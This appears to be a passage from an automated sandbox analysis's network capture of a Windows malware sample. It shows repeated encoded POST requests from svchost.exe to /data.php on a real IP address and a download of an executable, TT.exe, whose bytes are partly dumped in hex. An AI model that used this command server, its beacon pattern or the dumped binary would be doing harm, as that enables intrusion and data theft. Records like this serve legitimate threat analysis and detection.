                                                                                      Dec 26, 2024 12:05:06.143820047 CET1236INData Raw: 48 89 bc 24 a8 10 00 00 4c 89 b4 24 60 10 00 00 48 3b 9e 10 10 00 00 0f 83 15 01 00 00 0f 1f 44 00 00 80 7b 11 73 0f 85 eb 00 00 00 48 8b d3 48 8b ce e8 5b e6 ff ff 48 8b e8 48 85 c0 0f 84 78 02 00 00 4c 8d 73 12 ba 00 10 00 00 4c 89 74 24 28 4d
                                                                                      Data Ascii: H$L$`H;D{sHH[HHxLsLt$(M" LD$ \HL$P=)HHL$P$H%IHLHHHSHHHHHHHL
                                                                                      Dec 26, 2024 12:05:06.143834114 CET1236INData Raw: 00 00 eb 40 4c 8d 47 12 48 8d 94 24 d0 10 00 00 48 8d 8c 24 d0 20 00 00 e8 61 0b 00 00 41 3b c4 48 8d b4 24 d0 10 00 00 41 0f 44 dc e9 e3 fe ff ff 4c 8d 84 24 d0 00 00 00 48 8b d7 49 8b cd e8 fa e2 ff ff 8b d8 85 c0 75 2b 48 8b d7 49 8b cd e8 09
                                                                                      Data Ascii: @LGH$H$ aA;H$ADL$HIu+HIHI;8H'HWHVHHwAH$ 1L$0L$0L$0H$(1H$1L9t$0t$HD$0H8HD$0MvJ<
                                                                                      Dec 26, 2024 12:05:06.263509989 CET1236INData Raw: 8d 54 24 50 48 89 4c 24 50 41 b8 08 00 00 00 48 c1 e9 18 80 c1 0d 88 4c 24 53 48 8b c8 e8 28 3f 00 00 48 85 c0 75 22 48 8b cb e8 e7 bb 00 00 48 8d 5f 10 48 8b d3 48 8d 0d ed 8a 02 00 e8 58 ee ff ff 8b c6 e9 73 ff ff ff 48 8d 9f 10 10 00 00 ba 00
                                                                                      Data Ascii: T$PHL$PAHL$SH(?Hu"HH_HHXsHHLOLs2H|H@uH8pkgH HHHHOxKH80HuHHDyOHIHWH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549709185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:05.312515020 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:07.035650015 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:06 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.549710185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:07.283718109 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:08.960352898 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:08 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.549711185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:09.314829111 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:11.033709049 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:10 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.549712185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:11.291512966 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:13.035480022 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:12 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.549713185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:13.336030960 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:15.096095085 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:14 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.549715185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:15.375942945 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:17.081388950 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:16 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.549716185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:16.817986012 CET95OUTGET /TT.exe HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: 185.81.68.147
                                                                                      Cache-Control: no-cache
                                                                                      Dec 26, 2024 12:05:18.248161077 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:18 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Last-Modified: Tue, 24 Dec 2024 20:31:17 GMT
                                                                                      ETag: "f7c00-62a09febaef40"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 1014784
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e2 4a 34 37 a6 2b 5a 64 a6 2b 5a 64 a6 2b 5a 64 ed 53 59 65 a1 2b 5a 64 ed 53 5f 65 6b 2b 5a 64 65 a8 a7 64 a1 2b 5a 64 65 a8 59 65 ac 2b 5a 64 65 a8 5e 65 b4 2b 5a 64 65 a8 5f 65 f5 2b 5a 64 ed 53 5e 65 b4 2b 5a 64 b2 af 5e 65 d8 2b 5a 64 c9 5d f0 64 a1 2b 5a 64 a6 2b 5b 64 b6 2a 5a 64 ed 53 5b 65 bf 2b 5a 64 b2 af 53 65 b5 2b 5a 64 b2 af 5a 65 a7 2b 5a 64 b2 af 58 65 a7 2b 5a 64 52 69 63 68 a6 2b 5a 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 15 1a 6b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 5e 0b 00 00 3e 04 00 00 00 00 00 a8 a2 07 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$J47+Zd+Zd+ZdSYe+ZdS_ek+Zded+ZdeYe+Zde^e+Zde_e+ZdS^e+Zd^e+Zd]d+Zd+[d*ZdS[e+ZdSe+ZdZe+ZdXe+ZdRich+ZdPEdkg"(^>@`Xh$ 8@p.text|]^ `.rdataDpFb@@.data`H&@.pdata$@@.relocf@B
                                                                                      Dec 26, 2024 12:05:18.248187065 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 51 08 81 e2 fd ff 00 00 83 ca 02 8b c2 83 f0 01 0f af c2 c1 e8 08 0f b6 c0 c3 cc cc cc cc cc 48 89 5c 24 08 44 8b 11 41
                                                                                      Data Ascii: QH\$DALELL3AADQE3DAAiAH3A3A@H\$H\$Ht$WH xV4BgE#BxV4IHHt'fffffDHH
                                                                                      Dec 26, 2024 12:05:18.248199940 CET1236INData Raw: 00 72 08 81 c2 44 f8 ff ff eb 08 83 fa 50 72 03 83 c2 b0 8b 41 08 03 d2 c1 e0 06 03 41 04 8b 09 d1 e9 c1 e0 05 03 c1 41 8b 48 10 8d 54 d1 01 c1 e2 05 41 03 50 0c c1 e2 10 0b c2 c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 74 24 18 57 48 83
                                                                                      Data Ascii: rDPrAAAHTAPH\$Ht$WH HHI8ILD$0AHSuD$03H\$8Ht$@H _HK8HS0H\$8Ht$@H _H\$Hl$Ht$WH ILD$HHHD$Ha|$HDu$LD$
                                                                                      Dec 26, 2024 12:05:18.248248100 CET672INData Raw: 74 24 60 48 8b cb e8 7e 14 08 00 48 8b 6c 24 50 4c 8b 74 24 20 49 8b c4 48 83 c4 28 41 5f 41 5d 41 5c 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 56 41 55 41 56 41 57 48 83 ec 30 33 f6 45 33 c0 4c 8b f2 44 8d 4e 02 48 8b e9 41 bf ff ff 00
                                                                                      Data Ascii: t$`H~Hl$PLt$ IH(A_A]A\[@UVAUAVAWH03E3LDNHADFt3H0A_A^A]^]IHH\$`H|$(NI;HHD$pLBHHtLd$ AM;DI$HI;LHMGI+H+H=v+E3
                                                                                      Dec 26, 2024 12:05:18.248264074 CET1236INData Raw: 48 8b 53 58 41 83 cd ff 85 c0 4c 8d 45 48 8b fe 48 8b cb 41 0f 45 fd e8 a5 f9 ff ff 48 8b 53 58 4c 8d 45 58 85 c0 48 8b cb 41 0f 45 fd e8 0f f9 ff ff 48 8b 53 58 85 c0 4c 8d 45 50 48 8b cb 41 0f 45 fd e8 f9 f8 ff ff 48 8b 53 58 85 c0 4c 8d 45 48
                                                                                      Data Ascii: HSXALEHHAEHSXLEXHAEHSXLEPHAEHSXLEHHAEDtAD}HHSXLEHHLHu`tADeHLe`M;u9uPu9uXtHSXLEHHLtADeHHSXLEHHtAuHHSXLEHHK
                                                                                      Dec 26, 2024 12:05:18.248311043 CET1236INData Raw: 01 00 49 8b 5b 10 49 8b 73 18 49 8b 7b 20 4d 8b 63 28 49 8b e3 5d c3 cc cc cc cc cc cc 45 33 c9 45 33 c0 e9 55 fe ff ff cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 41 54 41 55 48 83 ec 20 48 8b d9 48 83 c9 ff 33 c0 48 8b fa 4c
                                                                                      Data Ascii: I[IsI{ Mc(I]E3E3UH\$Hl$Ht$ WATAUH HH3HLHSXMAHADHHiHAPKqHSXDHHD@-9uD@IDHSXDHH*DHSXDHHDH
                                                                                      Dec 26, 2024 12:05:18.248322964 CET1236INData Raw: 55 48 83 ec 20 33 db 45 8b e0 4c 8b ea 48 8b f9 8b f3 48 85 c9 75 11 b8 9a ff ff ff 48 83 c4 20 41 5d 41 5c 5f 5e 5b c3 39 59 70 74 ea 83 b9 f8 00 00 00 08 48 89 6c 24 50 4c 89 74 24 58 4c 89 7c 24 60 89 99 80 00 00 00 75 6a 39 99 fc 00 00 00 75
                                                                                      Data Ascii: UH 3ELHHuH A]A\_^[9YptHl$PLt$XL|$`uj9ubfDu HOHHHOxC0+tDvuH;Duu+HOxL
                                                                                      Dec 26, 2024 12:05:18.248333931 CET1236INData Raw: 5f c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8b f2 48 8b 51 58 49 8b f8 41 b9 04 00 00 00 41 b8 50 4b 06 06 48 8b d9 e8 14 e9 ff ff 85 c0 0f 85 e9 00 00 00 48 8b 53 58 44 8d 48 08 44 8d 40 2c 48 8b cb e8 f8 e8 ff ff 85 c0 0f 85 cd
                                                                                      Data Ascii: _H\$Ht$WH HQXIAAPKHHSXDHD@,HHSXDHD@-HHSXDHD@-HHSXDHE3Hu~HSXDHE3HugLXHSXDHHsuLLXHSXDHHXu1H
                                                                                      Dec 26, 2024 12:05:18.248639107 CET1236INData Raw: ae 48 f7 d1 48 ff c9 48 81 f9 ff ff 00 00 76 0a b8 9a ff ff ff e9 38 04 00 00 48 89 b4 24 a8 00 00 00 48 8b b4 24 d8 00 00 00 48 85 f6 74 1e 48 83 c9 ff 33 c0 48 8b fe f2 ae 48 f7 d1 48 ff c9 48 81 f9 ff ff 00 00 0f 87 9c 05 00 00 81 bc 24 c0 00
                                                                                      Data Ascii: HHHv8H$H$HtH3HHHH$$z{puHHLt$hL|$`L=LLEE3HuAH$H3HHHHH$H3IHHHHL$@MuD
                                                                                      Dec 26, 2024 12:05:18.248651981 CET1236INData Raw: 0f 85 82 00 00 00 83 bb f8 00 00 00 08 75 79 39 83 fc 00 00 00 75 71 44 8b 8c 24 f8 00 00 00 4c 89 ab a8 00 00 00 4c 89 ab b0 00 00 00 4c 89 ab b8 00 00 00 45 85 c9 7e 03 41 f7 d9 48 8d 05 2a 48 0b 00 c7 44 24 38 58 00 00 00 48 8d 4b 78 48 89 44
                                                                                      Data Ascii: uy9uqD$LLLE~AH*HD$8XHKxHD$0$AD$($AD$ EuD@u{H$Htg+$T$(L(DFHT$HHH8HD$ HSXHK8LD$HD@
                                                                                      Dec 26, 2024 12:05:18.369504929 CET1236INData Raw: cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8b 71 44 48 8b d9 66 66 66 0f 1f 84 00 00 00 00 00 8b 93 94 00 00 00 8b 7b 58 8b 43 44 2b bb 9c 00 00 00 8d 8c 06 fa fe ff ff 2b fa 3b d1 72 43 48 8b 4b 50 44 8b c6 48 8d 14
                                                                                      Data Ascii: H\$Ht$WH qDHfff{XCD++;rCHKPDH1D+N)))9vHpHyDHHSPDADHSPE+EABDCp


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.549717185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:17.433113098 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:19.148505926 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:18 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.549723185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:19.596404076 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:21.300894022 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:20 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.549730185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:20.827116013 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:22.404103041 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:22 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.549731185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:21.650710106 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:23.348923922 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:22 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.549733185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:22.637835026 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.549739185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:23.586175919 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
